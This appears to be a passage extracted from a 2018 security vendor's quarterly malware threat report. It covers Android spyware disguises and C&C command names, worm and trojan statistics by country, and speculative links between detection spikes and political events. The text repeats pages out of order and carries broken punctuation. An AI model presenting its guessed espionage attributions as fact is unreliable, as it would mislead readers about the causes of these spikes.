543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
